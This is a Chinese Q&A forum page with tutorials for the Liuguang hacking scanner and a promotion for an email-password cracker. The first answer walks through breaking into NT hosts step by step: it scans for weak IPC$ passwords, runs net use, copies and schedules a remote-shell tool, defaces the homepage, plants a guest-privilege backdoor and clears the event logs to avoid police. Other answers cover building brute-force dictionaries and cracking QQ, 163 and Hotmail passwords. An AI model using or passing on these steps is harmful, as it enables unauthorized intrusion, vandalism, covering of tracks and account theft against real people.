请教使用流光5.0高手
我来给你说几句吧!呵呵!我的KU6里面有流光5的教程,希望可以让你理解它!呵呵!还是不要轻易的利用哦!哈哈
流光是一款黑客工具,也是系统检测的工具.和X-SCAN SUPERSCAN的作用是一样的呵呵!
流光基础教程
一、目的和任务:
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
2、学习IPC探测的相关知识。
二、探测流程:
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
什么是IPC:
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机
4、探测中……
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)
有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
黑了他 !
开个dos prompt 执行如下命令,本次用的例子如下图。
1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接
2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。
3、 net time \\对方IP || 看看对方的本地时间
4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
5、 telnet 对方ip 端口 ||
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot
下面的图有演示
8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:
执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)
9、还能做成其他的么 ?
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
10、日志清除,断开连接 :
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete
这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。
在网吧写完 :( 错误之处请赐教。
只要是学习、谁都会遇到困难,如果你有时间还得向小榕、EKIN讨教!
为什么用流光拆解QQ邮箱时 服务器老连接失败
因为QQ邮箱有防破解系统,不允许多次的拆解,一般大点的服务器都有这功能
请说明流光的适用过程
一、 流光设置 使用流光前首先要对其进行设置,流光会使用向导的方式让用户方便地设置扫描参数。 1、 在流光主界面下,通过选择“文件”-“高级扫描向导”或使用快捷键CTRL+W打开高级扫描向导,在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址,在“目标系统”中选择预检测的操作系统类型,选中“获取主机名”“PING检查”,在“检测项目”中选择“全选”。
2 、 设置好之后,点下一步,然后一步一步分别对“PORTS”“POP3”“FTP”等检测项目进行详细设置,设置完成之后,选择流光自带的用户名字典即密码字典。
3、 将各项设置完成后,然后单击完成按钮,进入“选择主机”界面,这里选择“本地主机”表示使用本机执行扫描任务。 二、 开始扫描 单击开始按钮开始进行扫描就会出现扫描界面,在扫描过程中,如果想停止,通过单击最下角的取消来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫太大的网段,如果因扫描时间过长而久等,这时候再想让流光停下来是不容易的。 三、 查看扫描报告 扫描结束之后,流光会自动打开HTML格式的扫描报告,需要指出的是,在扫描完成后,流光不仅把扫描结果整理成报告文件,而且还把可以利用的主机列在流光界面最下方。
单击主机列表中的主机便可以直接对目标主机进行连接操作,除了使用“高级扫描向导”配置高级扫描外,还可以直接选取高级扫描工具,方法是依次单击“探测”菜单中的“高级扫描工具”。
在“高级扫描设置”窗口中可以自定义设置多个选项,这里所介绍的只是流光的一小部分功能,其它一些功能以后慢慢再说吧。流光扫描器自身的设置是比较复杂的,有很多选项可以自由设定,因而也给使用者更大的发挥空间,可以根据网络和机器状况来尝试改变这些设置,提高扫描器的性能,而且流光还有详细的帮助文档。 四、 关于字典文件的说明 流光中有大量的工具供用户生成字典文件,这是由于流光开发最初是设计成为一个纯粹的暴力破解工具,所以字典工具必不可少,单击菜单栏中的工具-字典工具-黑客字典III流光版,就可以启动字典工具。
在黑客字典III流光版中有丰富的选项设置密码中的“字母”“数字”与字符,由于是中文版,用户一看就明白,设置完成后,单击“文件存放位置”标签选择字典保存的名字和位置。
一切设置无误后,单击确定按钮,出现一个预览窗口,从这里可以看到产生的字典形式,确认无误后,按开始按钮字典即可生效。
除了可以按照组合方式产生字典外,还可以按照一定规则产生字典,例如按照中文拼音的规则和英文规定等,依次选择菜单栏中的工具-字典工具-根据拼音规则命令即可进行设置。如果字典文件太大,可以拆分字典。 五、 使用流光的说明 流光一款相当知名的黑客软件,集扫描破解于一身,当扫描出目标主机的用户名时候,然后在参考这些名称配合字典文件进行猜测密码,不过这种猜测是将用户名和密码一个一个进行匹配,验证成功即成功,所以这种方式称为暴力破解。
mailsee 1.0有破解版的吗?及下载地址
邮箱破解工具-咔嚓mailsee1.0
咔嚓mailsee1.0
是一款邮箱密码破解工具,咔嚓mailsee1.0
不但破解邮箱密码速度快,而且可以帮你找回各种常用邮箱的密码,像常见的163、126、网易、qq、yahoo、新浪、sohu、sina、TOM、搜狐、雅虎、Hotmail、MSN邮箱密码、信箱密码破解等,都可用我们密码破解资料站介绍的咔嚓mailsee1.0邮箱破解工具破解。可以解开多达136位密码。本软件可在
51看吧软件园下载,地址是:
0条大神的评论